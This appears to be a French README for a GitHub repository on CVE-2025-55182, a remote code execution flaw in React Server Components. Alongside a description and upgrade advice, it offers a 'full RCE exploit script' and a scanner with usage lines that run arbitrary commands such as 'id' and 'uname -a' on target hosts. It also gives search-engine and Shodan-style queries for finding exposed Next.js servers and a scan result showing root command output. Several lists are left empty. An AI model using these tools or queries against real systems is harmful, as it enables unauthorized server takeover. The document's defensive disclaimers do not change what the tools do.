
Une vulnérabilité critique d'exécution de code à distance (RCE) affectant l'implémentation des composants serveur React (RSC) dans plusieurs packages, notamment.
CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant l'implémentation des composants serveur React (RSC) au sein de plusieurs packages, notamment :
La vulnérabilité existe en raison d'une désérialisation non sécurisée des charges utiles envoyées via le protocole Flight interne utilisé par RSC. Lorsque certaines entrées non fiables transitent par les composants serveur React via des requêtes HTTP, l'exécution de code côté serveur peut être déclenchée.
Les versions affectées incluent :
Les versions corrigées incluent :
Les composants serveur React acceptent les requêtes du côté client qui sont analysées et désérialisées sur le backend. La vulnérabilité provient de contrôles insuffisants autour de la désérialisation des données entrantes, permettant à des charges utiles spécialement conçues d'être interprétées comme des composants serveur exécutables.
Lorsque cela se produit, une exécution arbitraire de JavaScript peut survenir sur le serveur, ce qui peut conduire à une compromission complète du serveur en fonction de l'environnement d'hébergement et des privilèges.
Si elle est exploitée, un attaquant peut être en mesure de :
Score CVSS : 10.0 – CRITIQUE
Vérifier si l'application expose les composants serveur React et si des versions affectées sont utilisées.
curl -I https://cible.com/?__rsc=1
Ces mots-clés aident à identifier si un référentiel public ou une application Web fait référence aux composants RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:votredomaine.com "react-server"
site:votredomaine.com "flight" "react"
site:votredomaine.com "rsc"
Destiné à l'audit interne du domaine de votre organisation uniquement.
Vérifiez l'utilisation exposée du framework, pas l'exploitation de vulnérabilité.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Pour automatiser l'analyse défensive, clonez la logique de détection basée sur des modèles pour l'évaluation de votre propre infrastructure :
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Script d'exploit RCE complet qui exécute des commandes arbitraires et récupère la sortie.
Utilisation :
python3 CVE-2025-55182.py http://cible.com:3000 -c "id"
python3 CVE-2025-55182.py https://cible.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scanner avec commande par défaut (id)
./scanner.sh -d example.com
# Exécuter une commande personnalisée
./scanner.sh -d example.com -c "whoami"
# Avec URL complète
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Domaine/URL cible (obligatoire)-c, --command - Commande à exécuter (par défaut : id)# Vérifier si la cible est vulnérable
./scanner.sh -d vulnerable-app.com
# Obtenir les informations système
./scanner.sh -d vulnerable-app.com -c "uname -a"
# Lister les fichiers
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Les modèles dans le dépôt sont destinés à :
IMPORTANT : Ces modèles ne doivent être exécutés que sur des systèmes que vous possédez ou pour lesquels vous êtes autorisé à effectuer une évaluation.
Les modèles Nuclei inclus dans ce dépôt sont destinés uniquement à :
Veuillez vous assurer :
Mettez à niveau vers l'une des versions corrigées :
Chercheur en sécurité • Formateur en cybersécurité • Chasseur de bugs
Devise : Zero Trust Full Secure 🚀
CVE-2025-55182 est actuellement l'une des menaces les plus critiques pour les infrastructures basées sur React. En raison du vecteur d'exploitation trivial et de la surface d'attaque non authentifiée, l'application immédiate du correctif est fortement conseillée. Toute organisation exécutant des versions RSC affectées devrait considérer une priorisation d'urgence.
Ce dépôt et cette documentation sont destinés à la recherche défensive et à la validation de sécurité des actifs que vous possédez. Toute utilisation abusive peut être illégale. Vous êtes responsable du respect des lois et de la politique de l'organisation.
Fait avec ❤️ par Cyber Leelawat
Zero Trust Full Secure 🎯🔐
|
|
|
|
|
|
|
| |